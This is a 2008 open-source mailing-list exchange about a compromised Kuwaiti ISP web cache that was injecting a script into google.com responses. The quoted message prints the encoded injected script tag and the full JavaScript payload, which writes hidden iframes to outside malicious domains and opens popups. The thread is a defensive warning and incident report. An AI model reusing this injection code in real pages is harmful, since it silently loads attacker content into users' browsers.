[General] FT Cache Compromise Details

kuwait at q8net.com kuwait at q8net.com
Thu Dec 4 18:13:43 +03 2008 

I did contact them by phone, they gave me an email which i also explained whats going on. By the way, i did the same test and all got was just "Bad Request" and none of the things you received like framing and java scripts.

--- On Thu, 12/4/08, Burhan Khalid <burhan at kuwaitnet.net> wrote:

> From: Burhan Khalid <burhan at kuwaitnet.net>
> Subject: [General] FT Cache Compromise Details
> To: "General OpenSource Discussion" <general at oskw.org>
> Date: Thursday, December 4, 2008, 4:41 PM
> I don't think I need to say this, but do not click on
> any links in this email.
> 
> Salaam All:
> 
>   Just as a reminder, as of this email date, the cache is
> still compromised (see paste below).
> 
> [burhan at t61p ~]$ telnet google.com 80
> Trying 72.14.205.100...
> Connected to google.com.
> Escape character is '^]'.
> GET / HTTP/1.1
> Host: www.google.com
> 
> HTTP/1.1 200 OK
> Content-Type: text/html; charset=ISO-8859-1
> Set-Cookie:
> PREF=ID=08e985e2eb9bfbbe:TM=1228395740:LM=1228395740:S=6SIcev5-b4ZYec5K;
> expires=Sat, 04-Dec-2010 13:02:20 GMT; path=/;
> domain=.google.com
> 
> <script language=javascript
> src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>
>                                                   16e2
> 
> Apparently its loading something from a chinese website
> (58.53.128.82), a javascript file, which does what normal
> such exploits do - loads in an inframe content form another
> compromised site, and opens popups:
> 
> function Get(){
> var Then = new Date()
> Then.setTime(Then.getTime() + 1*40*60*1000)
> var cookieString = new String(document.cookie)
> var cookieHeader = "cainibi="
> var beginPosition = cookieString.indexOf(cookieHeader)
> if (beginPosition != -1){
> } else
> { document.cookie =
> "cainibi=chongxinzuo;expires="+ Then.toGMTString()
> document.write("<div
> style=\"display:none\">");
> document.write("<iframe src=http://se.c66a.cn/
> width=0 height=0></iframe>");
> window.open("http://liaobamm.com");
> 
> }
> }
> document.write("<iframe
> src=http://w.c66d.cn/logo.htm width=100
> height=0></iframe>");
> Get();
> 
> 
> If anyone has an inside ear on FT, tell them to block
> access at their firewall to the offending IPs. Hell, they
> block Skype, why can't they block something I don't
> want.
> 
> Enjoy,
> --
> Burhan Khalid
> 
> _______________________________________________
> General mailing list
> General at oskw.org
> http://mail.oskw.org/mailman/listinfo/general_oskw.org

More information about the General mailing list